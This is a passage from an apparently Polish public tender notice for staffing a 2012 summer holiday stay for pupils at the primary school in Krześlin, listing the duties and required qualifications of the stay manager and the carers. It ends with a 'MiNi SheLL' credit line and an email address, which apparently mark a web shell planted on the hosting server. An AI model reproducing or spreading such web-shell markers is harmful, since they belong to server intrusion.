a) Realizacja zadań kierownika turnusu  dla uczniów w Szkole Podstawowej w Krześlinie w roku  2012 w okresie wakacji. Zadania obejmować będą przygotowanie i realizację turnusu wakacyjnego, nadzorowanie nauczycieli opiekunów, kierowanie wypoczynkiem zgodnie z obowiązującymi przepisami;
1)	opracowywanie planu pracy oraz rozkładu dnia wypoczynku i kontrola ich realizacji;
2)	ustalenie i przydzielenie szczegółowego zakresu czynności poszczególnym opiekunom
3)	kontrola wykonywania obowiązków przez pracowników;
4)	zapewnienie uczestnikom wypoczynku właściwej opieki i warunków bezpieczeństwa od momentu przejęcia ich od rodziców (prawnych opiekunów) do czasu ponownego przekazania rodzicom (prawnym opiekunom);
5)	nadzorowanie zapewnienie odpowiednich warunków zdrowotnych i higieniczno-sanitarnych w miejscu wypoczynku zgodnie z obowiązującymi przepisami w zakresie stanu sanitarnego pomieszczeń i otoczenia;
6)	informowanie o zachowaniu dzieci i młodzieży oraz ich stanie zdrowia - na wniosek rodziców (prawnych opiekunów);
7)	 dbanie zapewnienie zróżnicowanej diety uczestnikom wypoczynku;
8)	przechowywanie kopii dokumentów poświadczających kwalifikacje pracowników pedagogicznych przez 14 dni/ turnus . Łącznie dni (jeden dzień = 24 godz.) - 14 dni.
(Dotyczy CZĘŚCI II.) Osoba wykonująca zadana kierownika turnusu musi posiadać uprawnienia kierownika wypoczynku zgodnie z  Rozporządzeniem Ministra Edukacji Narodowej w sprawie warunków, jakie musza spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania ze zmianami wynikającymi z Rozporządzenia Ministra Edukacji Narodowej z dnia 9 grudnia 2009 r. (Dz.U. 2009 nr 218 poz. 1696).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ III Realizacja zajęć opiekuńczych podczas turnusu wakacyjnego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z poniższymi wymaganiami:
a) Realizacja zajęć opiekuńczych podczas turnusu wakacyjnego dla uczniów w Szkole Podstawowej w Krześlinie  w roku  2012 w okresie wakacji. Zajęcia będą obejmować  jedną grupę uczniów z klas I-VI. Do zadań opiekuna-wychowawcy będzie należało:
1)	zapoznanie się z kartami kwalifikacyjnymi uczestników wypoczynku;
2)	prowadzenie dziennika zajęć, 
3)	opracowywanie planów pracy wychowawczej grupy;
4)	organizowanie zajęć zgodnie z rozkładem dnia;
5)	sprawowanie opieki nad uczestnikami grupy w zakresie higieny, zdrowia, wyżywienia
6)	oraz innych czynności opiekuńczych;
7)	zapewnienie bezpieczeństwa uczestnikom grupy;
8)	prowadzenie innych zajęć zleconych przez kierownika wypoczynku.
9)	Zajęcia odbywać się będą  14 dni/ turnus dla grupy. Łącznie dni dla jednej grupy (jeden dzień = 24 godz.) - 14 dni.
 Osoba wykonująca zadana opiekuna-wychowawcy musi posiadać uprawnienia zgodnie z Rozporządzeniem Ministra Edukacji Narodowej w sprawie warunków, jakie musza spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania ze zmianami wynikającymi z Rozporządzenia Ministra Edukacji Narodowej z dnia 9 grudnia 2009 r. (Dz.U. 2009 nr 218 poz. 1696).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ IV Realizacja zajęć opiekuńczych podczas turnusu wakacyjnego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z poniższymi wymaganiami:
a) Realizacja zajęć opiekuńczych podczas turnusu wakacyjnego dla uczniów w Szkole Podstawowej w Krześlinie  w roku  2012 w okresie wakacji. Zajęcia będą obejmować  jedną grupę uczniów z klas I-VI. Do zadań opiekuna-wychowawcy będzie należało:
1)	zapoznanie się z kartami kwalifikacyjnymi uczestników wypoczynku;
2)	prowadzenie dziennika zajęć, 
3)	opracowywanie planów pracy wychowawczej grupy;
4)	organizowanie zajęć zgodnie z rozkładem dnia;
5)	sprawowanie opieki nad uczestnikami grupy w zakresie higieny, zdrowia, wyżywienia
6)	oraz innych czynności opiekuńczych;
7)	zapewnienie bezpieczeństwa uczestnikom grupy;
8)	prowadzenie innych zajęć zleconych przez kierownika wypoczynku.
9)	Zajęcia odbywać się będą  14 dni/ turnus dla grupy. Łącznie dni dla jednej grupy (jeden dzień = 24 godz.) - 14 dni.
 Osoba wykonująca zadana opiekuna-wychowawcy musi posiadać uprawnienia zgodnie z Rozporządzeniem Ministra Edukacji Narodowej w sprawie warunków, jakie musza spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania ze zmianami wynikającymi z Rozporządzenia Ministra Edukacji Narodowej z dnia 9 grudnia 2009 r. (Dz.U. 2009 nr 218 poz. 1696).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ V Realizacja zajęć opiekuńczych podczas turnusu wakacyjnego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z poniższymi wymaganiami:
a) Realizacja zajęć opiekuńczych podczas turnusu wakacyjnego dla uczniów w Szkole Podstawowej w Krześlinie  w roku  2012 w okresie wakacji. Zajęcia będą obejmować  jedną grupę uczniów z klas I-VI. Do zadań opiekuna-wychowawcy będzie należało:
1)	zapoznanie się z kartami kwalifikacyjnymi uczestników wypoczynku;
2)	prowadzenie dziennika zajęć, 
3)	opracowywanie planów pracy wychowawczej grupy;
4)	organizowanie zajęć zgodnie z rozkładem dnia;
5)	sprawowanie opieki nad uczestnikami grupy w zakresie higieny, zdrowia, wyżywienia
6)	oraz innych czynności opiekuńczych;
7)	zapewnienie bezpieczeństwa uczestnikom grupy;
8)	prowadzenie innych zajęć zleconych przez kierownika wypoczynku.
9)	Zajęcia odbywać się będą  14 dni/ turnus dla grupy. Łącznie dni dla jednej grupy (jeden dzień = 24 godz.) - 14 dni.
Osoba wykonująca zadana opiekuna-wychowawcy musi posiadać uprawnienia zgodnie z Rozporządzeniem Ministra Edukacji Narodowej w sprawie warunków, jakie musza spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania ze zmianami wynikającymi z Rozporządzenia Ministra Edukacji Narodowej z dnia 9 grudnia 2009 r. (Dz.U. 2009 nr 218 poz. 1696).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CZĘŚĆ VI Realizacja zajęć opiekuńczych podczas turnusu wakacyjnego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z poniższymi wymaganiami:
a) Realizacja zajęć opiekuńczych podczas turnusu wakacyjnego dla uczniów w Szkole Podstawowej w Krześlinie  w roku  2012 w okresie wakacji. Zajęcia będą obejmować  jedną grupę uczniów z klas I-VI. Do zadań opiekuna-wychowawcy będzie należało:
1)	zapoznanie się z kartami kwalifikacyjnymi uczestników wypoczynku;
2)	prowadzenie dziennika zajęć, 
3)	opracowywanie planów pracy wychowawczej grupy;
4)	organizowanie zajęć zgodnie z rozkładem dnia;
5)	sprawowanie opieki nad uczestnikami grupy w zakresie higieny, zdrowia, wyżywienia
6)	oraz innych czynności opiekuńczych;
7)	zapewnienie bezpieczeństwa uczestnikom grupy;
8)	prowadzenie innych zajęć zleconych przez kierownika wypoczynku.
9)	Zajęcia odbywać się będą  14 dni/ turnus dla grupy. Łącznie dni dla jednej grupy (jeden dzień = 24 godz.) - 14 dni.
Osoba wykonująca zadana opiekuna-wychowawcy musi posiadać uprawnienia zgodnie z Rozporządzeniem Ministra Edukacji Narodowej w sprawie warunków, jakie musza spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania ze zmianami wynikającymi z Rozporządzenia Ministra Edukacji Narodowej z dnia 9 grudnia 2009 r. (Dz.U. 2009 nr 218 poz. 1696).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com